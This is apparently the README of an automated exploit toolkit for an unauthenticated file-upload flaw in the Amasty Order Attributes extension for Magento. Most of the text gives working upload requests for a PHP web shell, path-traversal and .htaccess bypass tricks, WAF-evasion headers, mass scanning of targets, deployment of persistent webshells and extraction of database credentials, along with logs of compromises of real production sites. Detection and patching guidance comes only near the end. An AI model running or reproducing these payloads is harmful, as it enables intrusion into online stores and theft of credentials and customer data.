VENI | VIDI | VICI
CVE ID: CVE-2026-53787
CVSS Score: 9.3 (Critical)
Affected Versions: Amasty Order Attributes ≤ 3.16.0
Patched Version: 4.0.0
- Overview
- Vulnerability Details
- Exploit Features
- Quick Start
- Attack Vectors
- Usage Examples
- Manual Exploitation
- Output Files
- Technical Analysis
- .htaccess Bypass Techniques
- Exploitation Workflow
- Detection & Defense
- Real-World Examples
- Legal Notice
- References
CVE-2026-53787 is a critical unauthenticated arbitrary file upload vulnerability in Amasty Order Attributes for Magento. This vulnerability allows remote attackers to upload malicious files without authentication, leading to Remote Code Execution (RCE) on vulnerable Magento installations.
- Vulnerability Type: Unauthenticated Arbitrary File Upload → RCE
- Authentication Required: None (Completely Unauthenticated)
- Attack Complexity: Low
- CVSS 3.1 Score: 9.3 (Critical)
- Affected Versions: Amasty Order Attributes ≤ 3.16.0
- Patched Version: 4.0.0
- Public Exploit: Available
- Exploit Maturity: Weaponized (Full automation)
✅ Unauthenticated RCE - Complete server takeover without login
✅ Path Traversal - Escape upload directory restrictions (v3.16.0)
✅ Extension Bypass - Evade file type restrictions (90+ techniques)
✅ .htaccess Bypass - Case-sensitivity & trailing dot exploitation
✅ WAF Bypass - Built-in headers for Cloudflare/ModSecurity/AWS WAF
✅ Data Exfiltration - Access database credentials via Magento config
✅ Persistence - Deploy persistent webshells (Bob Marley + Mage.php)
The Amasty Order Attributes extension exposes unauthenticated REST API endpoints for file uploads:
POST /rest/V1/amasty_orderattr/uploadFile
POST /rest/all/V1/amasty_orderattr/uploadFile
POST /rest/default/V1/amasty_orderattr/uploadFile
Vulnerability Chain:
- Missing Authentication Check - No session/token validation
- Insufficient Filename Sanitization - Path traversal not properly filtered
- Weak Extension Filtering - Accepts dangerous file types (.php, .phar, .phtml)
- Directory Escape - Can write outside intended
amasty_checkoutfolder
1. Attacker sends POST request to /rest/V1/amasty_orderattr/uploadFile
↓
2. Server accepts upload WITHOUT authentication
↓
3. Filename: "../../../shell.php" → Path traversal to /media/
↓
4. File uploaded to: /pub/media/shell.php
↓
5. Attacker accesses: https://target.com/media/shell.php?cmd=id
↓
6. Remote Code Execution achieved! ✅
Vulnerable if:
- ✅ Amasty Order Attributes extension installed (≤ v3.16.0)
- ✅ REST API endpoints accessible
- ✅ Version < 4.0.0
Note: This is NOT a general Magento vulnerability. Only sites with the Amasty Order Attributes extension are affected.
- Automated Detection - Identifies vulnerable Amasty installations
- Multi-Endpoint Testing - Tests 3 REST API endpoints per target
- Response Analysis - Parses JSON responses to confirm vulnerability
- Batch Processing - Scans thousands of targets with threading
- Harmless Text Files - Upload .txt files for non-destructive testing
- Custom Markers - Configurable marker text (default: "Bob Marley is here")
- Verification - Automatically checks if file is accessible
- Mass Deployment - Upload PoC to hundreds of targets in parallel
- PHP Extensions - .php, .phar, .phtml, .php5, .php4, .php3, .pht
- Trailing Dots - .php., .phar., .phtml. (proven bypass)
- Double/Triple Dots - .php.., .phar.., .phtml.., .phtml...
- PHTML Case Variations - .PhTml, .pHtml, .PHTML, .pHtMl (33 variations)
- PHT Variations - .pht, .phT, .pHt, .PHT, .pht., .phT..
- Case Variations - .pHp, .phAr, .PHP, .PHP5, .PHAR
- Null Bytes - .php%00.jpg, .phar%00.txt (truncation)
- Double Extensions - .jpg.php, .txt.phar, .pdf.phar
- Alternative - .inc, .inc., .module, .pgif
- Parallel Testing - Tests all extensions simultaneously (8 workers default)
- Auto-Verification - Uses
idcommand to confirm RCE - Strict Filtering - Rejects HTML/PHP source code responses
- Bob Marley File Manager - Full-featured PHP webshell
- File upload/download
- File editor
- Command execution
- Directory browser
- Mage.php Control Panel - Magento-specific data extraction
- Database credentials
- Admin accounts
- Configuration dump
- Customer data access
- Multi-Extension Testing - Tries 40+ extensions until one executes
- Directory Escape -
../../../filenameto escapeamasty_checkout/ - Landing Locations:
/media/filename(v3.16.0) ✅ Most common/pub/filename(v<2.4.2) ✅ Older versions/pub/media/filename✅ Partial escape
- Security Boundary Aware - Respects 3-level max (4+ triggers error)
- Multiple Payload Types - minimal, exec, passthru, system, shell_exec
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1- Detailed Logging - Shows every request/response
- Upload Verification - Displays file paths and test URLs
- RCE Testing - Shows command output in real-time
- Debugging - Identifies why uploads/RCE fails
# Python 3.x with libraries
pip3 install requests urllib3 colorama# Run the main exploit (interactive menu)
python3 amasty.py
# Interactive menu will appear
[1] Scan - Detect vulnerable Amasty installations
[2] PoC Upload - Harmless text file (configurable marker)
[3] Standard RCE - Multiple extensions (RECOMMENDED)
[4] Full Webshell - Bob Marley File Manager + Mage.php
[5] Custom Extensions - Test your own extensions
[6] Path Traversal - Escape to /pub (BYPASS .htaccess)
[0] Exit
[?] Select option:Purpose: Dedicated .phtml extension bypass testing with both normal and path traversal methods
Features:
- Tests 33+ .phtml case variations (.PhTml, .pHtml, .PHTML, etc.)
- Two-stage testing:
- Normal upload → Test in
/media/amasty_checkout/ - Path traversal → Test in
/media/
- Normal upload → Test in
- Strict RCE validation (rejects HTML/PHP source code)
- Mass testing with threading
- Detailed method tracking (Normal vs Traversal)
Usage:
# Single target
python amatest.py -u https://target.com
# Mass testing
python amatest.py -l targets.txt
# High-speed scanning
python amatest.py -l targets.txt -t 20Output:
[RCE-NORMAL] https://site.com | .PhTml | /media/amasty_checkout/a/b/shell.PhTml
[RCE-TRAVERSAL] https://site.com | .phtml. | /media/shell.phtml.
Results: AmaTest_Results_TIMESTAMP/
├── RCE_Shells.txt # All working shells
└── Summary.txt # Method success rates
When to use amatest.py:
- ✅ Specifically testing .phtml case bypass techniques
- ✅ Comparing normal upload vs path traversal effectiveness
- ✅ Need strict false-positive filtering
- ✅ Want detailed extension success statistics
When to use amasty.py:
- ✅ Full attack chain (scan → PoC → RCE → webshells)
- ✅ Interactive menu-driven workflow
- ✅ Testing all 90+ extension variations
- ✅ Deploying Bob Marley/Mage.php webshells
Purpose: Identify vulnerable Magento sites running Amasty Order Attributes
Input: List of target URLs
Process:
- Tests 3 API endpoints per target
- Sends test upload payload
- Analyzes response (file path string = vulnerable)
- Saves vulnerable targets to
Vulnerable.txt
Output: List of confirmed vulnerable sites
Example:
[?] Select option: 1
[?] Target list file path: targets.txt
[?] Threads (default 10): 20
[?] Verbose mode? (y/N): n
[*] Scanning 1000 targets with 20 threads...
[VULN] https://site1.com
[VULN] https://site2.com
[VULN] https://site3.com
...
[+] Found 47/1000 vulnerable targets
[+] Results saved: Amasty_Results_20260709_123456/Vulnerable.txtPurpose: Non-destructive verification of upload capability
Method: Upload harmless .txt files with custom marker
Verification: Checks if file is accessible at predicted URLs
Example:
[?] Select option: 2
[?] Marker text (default: Bob Marley is here): TEST123
[SUCCESS] https://site1.com
URL: https://site1.com/media/amasty_checkout/a/b/abc123.txt
[SUCCESS] https://site2.com
URL: https://site2.com/pub/media/amasty_checkout/x/y/xyz456.txt
[+] Success: 2/5
[+] Results: Amasty_Results_20260709_123456/PoC.txtPurpose: Achieve Remote Code Execution with multiple PHP extensions
Method:
- Uploads PHP payloads with 50+ different extensions
- Tests each extension in parallel (configurable workers)
- Verifies RCE using
idcommand - Saves working shells with detailed output
Extensions Tested (90+ variations):
Priority (Proven Effective):
- Trailing Dots:
.php..phar..phtml.✅ Most reliable - Double/Triple Dots:
.php...phar...phtml...phtml... - Case-Sensitive
.phtml:.PhTml.pHtml.PHTML.pHtMl✅ Bypasses FilesMatch
Standard PHP Extensions:
.php.phar.phtml.php5.php4.php3.pht.shtml
PHTML Case Variations (33 combinations):
- Base:
.phtml.PhTml.pHtml.PHTML.pHtMl.PHtml.phTml.phTmL.phtMl.PhTmL.pHTml.PHtMl - With Dots:
.PhTml..PhTml...pHtml..pHtml...PHTML..PHTML...pHtMl..PHtml...phTml...
PHT Variations:
.pht.phT.pHt.PHT.pht..phT..
Other Bypass Techniques:
- Case Variations:
.pHp.PHP5.phAr.PhAr.PHAR.Php.PHP - Null Bytes:
.php%00.jpg.phar%00.txt.phtml%00.gif - Double Extensions:
.jpg.php.txt.phar.pdf.phar.txt.phtml - Alternative:
.inc.inc..module.pgif
Output Format (RCE.txt):
================================================================================
Target: https://site1.com
Working Extensions: 2
Time: 23.9s
================================================================================
Extension: .phar
Payload Type: minimal
Shell URL: https://site1.com/media/amasty_checkout/u/k/shell.phar
Test: curl 'https://site1.com/media/amasty_checkout/u/k/shell.phar?cmd=id'
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Extension: .php.
Payload Type: minimal
Shell URL: https://site1.com/pub/media/amasty_checkout/a/o/rce.php.
Test: curl 'https://site1.com/pub/media/amasty_checkout/a/o/rce.php.?cmd=id'
Output: uid=1000(magento) gid=1000(magento) groups=1000(magento)
Purpose: Deploy persistent, feature-rich webshells for post-exploitation
Components:
-
Bob Marley File Manager - Full web interface
- Upload/Download files
- Edit files (syntax highlighting)
- Execute shell commands
- Browse directories
- File permissions management
-
Mage.php Control Panel - Magento-specific tools
- Database credentials extraction
- Admin account enumeration
- Configuration file reader
- Customer data access
Method:
- Downloads Bob Marley shell from GitHub
- Tests 40+ extensions until one executes
- Deploys both Bob Marley and Mage.php
- Verifies PHP execution (not just file access)
Output:
Bob_Shells.txt:
https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4.phar
Mage_Shells.txt:
https://site1.com/media/amasty_checkout/b/o/bob_a1b2_mage.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4_mage.phar
Access:
https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
(Opens full file manager interface in browser)
Purpose: Test specific extensions for targeted exploitation
Use Case:
- Target has custom PHP handlers (.php7, .pht)
- Want to test specific extension bypass
- Environment-specific extensions
Example:
[?] Select option: 5
[?] Extensions (comma separated): .php7, .pht, .inc
[SUCCESS] https://site1.com - Extension .php7 worked!
Shell: https://site1.com/media/amasty_checkout/c/u/custom1.php7Purpose: Escape amasty_checkout directory to /media/ or /pub/
Why Important:
amasty_checkoutfolder may have.htaccessblocking PHP/media/root often allows PHP execution/pub/bypasses more restrictions
Method:
- Upload with filename:
../../../shell.php - Server sanitizes to:
/_/_/../../../shell.php - Actually lands in:
/media/shell.php✅
Security Boundary:
- 3 levels max:
../../../✅ Escapes to/media/ - 4 levels:
../../../../❌ Triggers security error
Successful Path Traversal Indicators:
Response: "\/_\/_\/..\/..\/..\/shell.php"Testing:
curl "https://site.com/media/shell.php?cmd=id"
curl "https://site.com/pub/shell.php?cmd=id"
curl "https://site.com/pub/media/shell.php?cmd=id"Example:
[?] Select option: 6
[RCE SUCCESS] https://site1.com
Shell: https://site1.com/media/rce.php
Payload: minimal | Path: ../../../rce.php
[RCE SUCCESS] https://site2.com
Shell: https://site2.com/pub/media/shell.phar
Payload: exec | Path: ../../../shell.phar# Step 1: Scan for vulnerabilities
python3 amasty.py
[?] Select option: 1
[?] Target list file path: magento-sites.txt
[?] Threads: 50
[?] Verbose mode? n
[+] Found 123 vulnerable targets
[+] Results: Amasty_Results_20260709_141523/Vulnerable.txt
# Step 2: Verify with PoC upload
[?] Select option: 2
[?] Marker text: CONFIRMED_VULN_2026
[+] Success: 118/123
[+] Results: Amasty_Results_20260709_141523/PoC.txt
# Step 3: Deploy webshells
[?] Select option: 4
[DEPLOYED] https://site1.com
Webshell: https://site1.com/media/amasty_checkout/b/o/bob_x7y9.phar.
Mage Shell: https://site1.com/media/amasty_checkout/b/o/bob_x7y9_mage.phar.
[+] Successful: 89/118
[+] Bob shells: Amasty_Results_20260709_141523/Bob_Shells.txt
[+] Mage shells: Amasty_Results_20260709_141523/Mage_Shells.txtpython3 amasty.py
[?] Select option: 3
[?] Target list file path: single-target.txt
[?] Threads: 10
[?] Verbose mode? y
[?] Parallel workers: 15
[*] STANDARD RCE - Multiple Extension Testing
[*] Testing https://target.com with 51 extensions...
[VERBOSE] Testing extension .php. with file: abc123.php.
[VERBOSE] Uploading abc123.php. to: https://target.com/rest/V1/amasty_orderattr/uploadFile
[VERBOSE] Upload response: 200
[VERBOSE] Upload response body: /a/b/abc123.php.
[VERBOSE] Using actual path from response: /a/b/abc123.php.
[VERBOSE] Testing RCE at: https://target.com/media/amasty_checkout/a/b/abc123.php.?cmd=id
[VERBOSE] RCE test response: 200
[VERBOSE] RCE output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[VERBOSE] SUCCESS! Found uid= in output - RCE confirmed!
[SUCCESS] https://target.com - Extension .php. worked!
Shell: https://target.com/media/amasty_checkout/a/b/abc123.php.
[+] Standard RCE testing complete!
[+] Results: Amasty_Results_20260709_143022/RCE.txtpython3 amasty.py
[?] Select option: 6
[*] PATH TRAVERSAL RCE - Escape to /media directory
[*] Testing 50 targets...
[RCE SUCCESS] https://site1.com
Shell: https://site1.com/media/rce123.php
Payload: minimal | Path: ../../../rce123.php
# Test the shell
$ curl "https://site1.com/media/rce123.php?cmd=whoami"
www-data
$ curl "https://site1.com/media/rce123.php?cmd=cat+/var/www/html/app/etc/env.php"
<?php
return [
'db' => [
'connection' => [
'default' => [
'host' => 'localhost',
'dbname' => 'magento',
'username' => 'mage_user',
'password' => 'SuperSecret123!',
...curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"Qm9iIE1hcmxleSBpcyBIZXJl\",\"fileName_with_extension\":\"test.txt\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFileVulnerable Response:
"/t/e/test.txt"Patched Response:
{"message":"Specified request cannot be processed."}REM Payload: <?php system($_GET['cmd']); ?>
REM Base64: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\",\"fileName_with_extension\":\"shell.php.\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFileResponse:
"/s/h/shell.php."curl "https://target.com/media/amasty_checkout/s/h/shell.php.?cmd=id"
curl "https://target.com/pub/media/amasty_checkout/s/h/shell.php.?cmd=id"Success:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\",\"fileName_with_extension\":\"../../../rce.php\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFileResponse (Sanitized):
"\/_\/_\/..\/..\/..\/rce.php"Test Paths:
curl "https://target.com/media/rce.php?cmd=id"
curl "https://target.com/pub/media/rce.php?cmd=id"
curl "https://target.com/media/amasty_checkout/_/_/../../../rce.php?cmd=id"# Test vulnerability
$body = @{
fileContent = @{
base64_encoded_data = "Qm9iIE1hcmxleSBpcyBIZXJl"
fileName_with_extension = "test.txt"
}
} | ConvertTo-Json
Invoke-RestMethod -Uri "https://target.com/rest/default/V1/amasty_orderattr/uploadFile" -Method Post -Body $body -ContentType "application/json"
# Upload PHP shell
$phpShell = @{
fileContent = @{
base64_encoded_data = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+"
fileName_with_extension = "shell.php."
}
} | ConvertTo-Json
Invoke-RestMethod -Uri "https://target.com/rest/default/V1/amasty_orderattr/uploadFile" -Method Post -Body $phpShell -ContentType "application/json"
# Test RCE
Invoke-WebRequest -Uri "https://target.com/media/amasty_checkout/s/h/shell.php.?cmd=id"Amasty_Results_YYYYMMDD_HHMMSS/
├── Vulnerable.txt # Scan results
├── PoC.txt # PoC upload URLs
├── RCE.txt # Detailed RCE results
├── Bob_Shells.txt # Bob Marley webshell URLs
├── Mage_Shells.txt # Mage.php URLs
├── Custom_Shells.txt # Custom extension URLs
└── PathTraversal_Shells.txt # Path traversal shells
https://site1.com
https://site2.com
https://site3.com
https://site1.com/media/amasty_checkout/a/b/abc123.txt
https://site2.com/pub/media/amasty_checkout/x/y/xyz456.txt
================================================================================
Target: https://site1.com
Working Extensions: 2
Time: 23.9s
================================================================================
Extension: .phar
Payload Type: minimal
Shell URL: https://site1.com/media/amasty_checkout/u/k/shell.phar
Test: curl 'https://site1.com/media/amasty_checkout/u/k/shell.phar?cmd=id'
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Extension: .php.
Payload Type: exec
Shell URL: https://site1.com/pub/media/amasty_checkout/a/o/rce.php.
Test: curl 'https://site1.com/pub/media/amasty_checkout/a/o/rce.php.?cmd=id'
Output: uid=1000(magento) gid=1000(magento) groups=1000(magento)
https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4.phar
POST /rest/V1/amasty_orderattr/uploadFile
POST /rest/all/V1/amasty_orderattr/uploadFile
POST /rest/default/V1/amasty_orderattr/uploadFile
POST /rest/default/V1/amasty_orderattr/uploadFile HTTP/1.1
Host: target.com
Content-Type: application/json
{
"fileContent": {
"base64_encoded_data": "BASE64_ENCODED_CONTENT",
"fileName_with_extension": "filename.ext"
}
}Vulnerable (Success):
"/c/h/char1char2filename.ext"Vulnerable (Alternative):
{
"file": "/path/to/file",
"url": "https://site.com/media/...",
"path": "/media/..."
}Vulnerable (Empty Success):
{}Patched (Error):
{
"message": "attribute_code is required"
}Security Boundary Error (4+ levels):
{
"message": "Path \"%1\" cannot be used with directory \"%2\"",
"parameters": [
"amasty_checkout\/_\/_\/..\/..\/..\/..\/file.php",
"\/var\/www\/html\/pub\/media\/"
]
}Standard Upload:
Filename: abc123.php
Server: Extracts first 2 chars (a, b)
Storage: /media/amasty_checkout/a/b/abc123.php
Access: https://site.com/media/amasty_checkout/a/b/abc123.php
Path Traversal (v3.16.0):
Filename: ../../../shell.php
Server Sanitizes: /_/_/../../../shell.php
Actually Lands: /media/shell.php ✅
Access: https://site.com/media/shell.php
Path Traversal (v<2.4.2 - Older):
Filename: ../../../shell.php
Could Escape to: /pub/shell.php or /shell.php
More dangerous, but rare
Maximum Escape: 3 directory levels
"../../../file.php" # ✅ Allowed - Lands in /media/
"../../../../file.php" # ❌ Blocked - Would escape /pub/media/Error on 4+ levels:
"Path cannot be used with directory"
Shows full server path (info disclosure)
Problem: Magento's /pub/media/amasty_checkout/.htaccess blocks PHP execution:
<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>Solution: Bypass via case-sensitivity or path traversal to /media/
Vulnerability: FilesMatch regex is case-sensitive but Apache PHP handler is case-insensitive
Vulnerable Regex:
<FilesMatch ".*\.(phtml)$">
SetHandler default-handler
</FilesMatch>Exploitable Extensions:
✅ .PhTml - Capital P, T, m
✅ .pHtml - Capital H, m
✅ .PHTML - All capitals
✅ .pHtMl - Mixed case
✅ .phTml - Capital T, m
... 33 variations total
How It Works:
1. Upload: shell.PhTml
↓
2. FilesMatch Check:
Pattern: .*\.(phtml)$
Input: shell.PhTml
Match: NO (case mismatch - phtml != PhTml)
Action: Skip SetHandler (PHP handler NOT disabled)
↓
3. Apache MIME Handler:
.phtml extension (case-insensitive)
Action: Execute as PHP
↓
4. Result: ✅ RCE!
Proof of Concept:
# Upload with case variation
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=","fileName_with_extension":"shell.PhTml"}}' \
https://target.com/rest/V1/amasty_orderattr/uploadFile
# Execute
curl "https://target.com/media/amasty_checkout/s/h/shell.PhTml?0=id"
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)Vulnerability: FilesMatch regex uses $ anchor which requires exact end match
Vulnerable Regex:
<FilesMatch ".*\.(phtml)$">
SetHandler default-handler
</FilesMatch>Exploitable Extensions:
✅ .phtml. - One trailing dot
✅ .phtml.. - Two trailing dots
✅ .phtml... - Three trailing dots
✅ .PhTml. - Case variation + dot
✅ .PhTml.. - Case variation + double dot
How It Works:
1. Upload: shell.phtml.
↓
2. FilesMatch Check:
Pattern: .*\.(phtml)$
Input: shell.phtml.
Match: NO (ends with '.' not 'l')
Action: Skip SetHandler
↓
3. Apache/OS Behavior:
Linux/Windows: Trailing dots stripped or ignored
Actual filename: shell.phtml (dot removed)
↓
4. Apache MIME Handler:
Extension: .phtml
Action: Execute as PHP
↓
5. Result: ✅ RCE!
Proof of Concept:
# Upload with trailing dot
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"rce.phtml."}}' \
https://target.com/rest/V1/amasty_orderattr/uploadFile
# Execute (note: dot may or may not be in URL depending on server)
curl "https://target.com/media/amasty_checkout/r/c/rce.phtml?cmd=id"
curl "https://target.com/media/amasty_checkout/r/c/rce.phtml.?cmd=id"Why: /media/ has a weaker .htaccess that allows certain extensions
/pub/media/.htaccess (Weak):
<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGIVulnerable: Same case-sensitivity flaw!
Attack:
# Upload with path traversal + case bypass
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=","fileName_with_extension":"../../../pwn.PhTml"}}' \
https://target.com/rest/V1/amasty_orderattr/uploadFile
# File lands in /media/ instead of /media/amasty_checkout/
curl "https://target.com/media/pwn.PhTml?0=id"Default Magento /pub/media/.htaccess:
Options -Indexes
<IfModule mod_php7.c>
php_flag engine 0
</IfModule>
<IfModule mod_php.c>
php_flag engine 0
</IfModule>
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>Bypass Analysis:
| Directive | Purpose | Bypassed By |
|---|---|---|
AddHandler cgi-script .php |
Mark .php as CGI | ❌ Only affects .php exactly |
Options -ExecCGI |
Disable CGI execution | ✅ Doesn't affect mod_php/PHP-FPM |
php_flag engine 0 |
Disable mod_php | ✅ Module-specific, doesn't affect all |
FilesMatch .*\.(phtml)$ |
Disable PHP handler | ✅ Case-sensitive! .PhTml bypasses |
From Real-World Testing (production targets confirmed):
| Extension | Normal Upload | Path Traversal | Notes |
|---|---|---|---|
.PhTml |
✅ RCE | ✅ RCE | Most reliable |
.pHtml |
✅ RCE | ✅ RCE | Case bypass |
.PHTML |
✅ RCE | ✅ RCE | Uppercase |
.pHtMl |
✅ RCE | ✅ RCE | Mixed case |
.phtml. |
✅ RCE | Trailing dot | |
.phtml.. |
✅ RCE | Double dot | |
.phT |
✅ RCE | ✅ RCE | PHT variation |
.pHt |
✅ RCE | ✅ RCE | PHT variation |
Total Working Extensions: 33+ .phtml variations alone
# Case-insensitive + trailing dot protection
<FilesMatch "(?i).*\.(ph(p[3457]?|t|tml\.?)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>Changes:
(?i)= Case-insensitive matchingtml\.?= Optional trailing dot after phtml
graph TD
A[Start] --> B[Load Target List]
B --> C[Option 1: Scan]
C --> D[Vulnerable Targets Found]
D --> E[Option 2: PoC Upload]
E --> F[Verify File Access]
F --> G[Option 3: Standard RCE]
G --> H{RCE Success?}
H -->|Yes| I[Option 4: Deploy Webshells]
H -->|No| J[Option 6: Path Traversal]
J --> K{RCE Success?}
K -->|Yes| I
K -->|No| L[Option 5: Custom Extensions]
L --> I
I --> M[Access Webshells]
M --> N[Post-Exploitation]
1. Identify Magento Site
↓
2. Test API Endpoint (curl POST)
↓
3. Analyze Response (JSON with file path = vuln)
↓
4. Upload PHP Shell (.php.)
↓
5. Construct Access URLs (char1/char2 logic)
↓
6. Test RCE (shell.php?cmd=id)
↓
7. Deploy Full Webshell
↓
8. Extract Database Credentials (app/etc/env.php)
↓
9. Maintain Persistence
# Apache/Nginx access logs
grep "/rest/.*amasty_orderattr/uploadFile" /var/log/nginx/access.log
grep "POST.*uploadFile" /var/log/apache2/access.logIndicators:
- Multiple POST requests to
/rest/*/amasty_orderattr/uploadFile - Requests from unusual IPs
- High frequency of 200 responses
- Base64-encoded payloads in logs
# Monitor upload directories
auditctl -w /var/www/html/pub/media/amasty_checkout/ -p wa -k amasty_upload
auditctl -w /var/www/html/pub/media/ -p wa -k media_upload
# Check for suspicious files
find /var/www/html/pub/media/amasty_checkout/ -name "*.php*" -o -name "*.phar*"
find /var/www/html/pub/media/ -maxdepth 1 -name "*.php*"# Block suspicious uploads to Amasty endpoints
SecRule REQUEST_URI "@contains /amasty_orderattr/uploadFile" \
"id:1001,phase:2,t:none,t:lowercase,deny,status:403,\
msg:'Amasty Upload Attempt Blocked'"
# Detect base64-encoded PHP payloads
SecRule REQUEST_BODY "@contains base64_encoded_data" \
"chain,id:1002,phase:2,deny,status:403"
SecRule REQUEST_BODY "@contains PD9waHA" \
"msg:'PHP Payload Detected'"(http.request.uri.path contains "/amasty_orderattr/uploadFile") and
(http.request.method eq "POST") and
(not ip.src in {WHITELIST_IPS})
Update Amasty Extension:
# Update to v4.0.0 or higher
composer require amasty/module-order-attributes:^4.0.0
php bin/magento setup:upgrade
php bin/magento setup:di:compile
php bin/magento cache:flushTemporary Workaround (If can't update immediately):
# Nginx - Block API endpoints
location ~ /rest/.*/amasty_orderattr/uploadFile {
deny all;
return 403;
}# Apache - Block API endpoints
<LocationMatch "/rest/.*/amasty_orderattr/uploadFile">
Require all denied
</LocationMatch>Add API authentication requirement:
// app/code/Amasty/OrderAttributes/Plugin/RestAuth.php
public function beforeExecute($subject, $request)
{
if (!$this->authContext->isAllowed()) {
throw new \Magento\Framework\Exception\AuthenticationException(
__('Authentication required')
);
}
}Disable PHP execution in upload directories:
# /pub/media/.htaccess
<FilesMatch "\.(php|php3|php4|php5|php7|phtml|phar|inc)$">
Require all denied
</FilesMatch># nginx.conf
location ~* ^/pub/media/.*\.(php|php3|php4|php5|php7|phtml|phar|inc)$ {
deny all;
}Sanitize filenames properly:
$filename = basename($filename); // Remove directory components
$filename = preg_replace('/\.\.+/', '', $filename); // Remove ..
$filename = preg_replace('/[^a-zA-Z0-9._-]/', '', $filename); // Whitelist charsSet up alerts for:
- New files in
/pub/media/amasty_checkout/ - PHP files in
/pub/media/root - Unusual POST requests to Amasty API
- Failed authentication attempts
Example Alert (OSSEC):
<rule id="100001" level="10">
<if_matched_regex>POST /rest/.*amasty_orderattr/uploadFile</if_matched_regex>
<description>Amasty Order Attributes Upload Attempt</description>
</rule>Target: https://[REDACTED-TARGET-1].com
Vulnerability Status: ✅ Confirmed vulnerable
Successful Extensions: 11+ working variations
Discovery:
# PoC Upload confirmed
https://[REDACTED-TARGET-1].com/media/customer_address/h/v/hvppdmpe.txt
Marker: "Bob Marley is here" ✅
# Extension bypass testing
python amatest.py -l targets.txt -t 20Working Extensions:
✅ .PhTml - https://[REDACTED-TARGET-1].com/media/amasty_checkout/r/u/rupdfr.PhTml
✅ .pHtml - https://[REDACTED-TARGET-1].com/media/amasty_checkout/e/p/epvslb.pHtml
✅ .PHTML - https://[REDACTED-TARGET-1].com/media/amasty_checkout/k/y/kyxzwh.PHTML
✅ .pHtMl - https://[REDACTED-TARGET-1].com/media/amasty_checkout/g/v/gvntuq.pHtMl
✅ .PHtml - https://[REDACTED-TARGET-1].com/pub/media/amasty_checkout/y/e/yeeaiu.PHtml
✅ .phTml - https://[REDACTED-TARGET-1].com/media/amasty_checkout/n/w/nwcocu.phTml
✅ .PhTmL - https://[REDACTED-TARGET-1].com/media/amasty_checkout/l/n/lnusxl.PhTmL
✅ .pHTml - https://[REDACTED-TARGET-1].com/media/amasty_checkout/d/g/dgbuxv.pHTml
... 11 total confirmed
Key Findings:
- Normal uploads work (no path traversal needed on this target)
.htaccesshas case-sensitive FilesMatch regex- All .phtml case variations bypass successfully
- Files accessible at
/media/amasty_checkout/with RCE confirmation
Exploitation:
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"test.PhTml"}}' \
https://[REDACTED-TARGET-1].com/rest/V1/amasty_orderattr/uploadFile
# RCE Test
curl "https://[REDACTED-TARGET-1].com/media/amasty_checkout/t/e/test.PhTml?cmd=id"
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)Target: https://[REDACTED-TARGET-2].com
Vulnerability Status: ✅ Path traversal successful
Method: Path traversal to /media/
Challenge:
- Normal uploads to
/media/amasty_checkout/blocked by strict.htaccess - PHP execution disabled in upload directory
Solution:
# Path traversal upload
curl -X POST -H "Content-Type: application/json" \
-d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"../../../wb3.PhTml"}}' \
https://[REDACTED-TARGET-2].com/rest/default/V1/amasty_orderattr/uploadFile
# Response
"\/_\/_\/..\/..\/..\/wb3.PhTml"
# File escaped to /media/
curl "https://[REDACTED-TARGET-2].com/media/wb3.PhTml?cmd=id"
# ✅ RCE successful!Key Findings:
- Path traversal using
../../../required - Files in
/media/amasty_checkout/return PHP source code (blocked) - Files in
/media/execute PHP successfully - Demonstrates importance of path traversal bypass
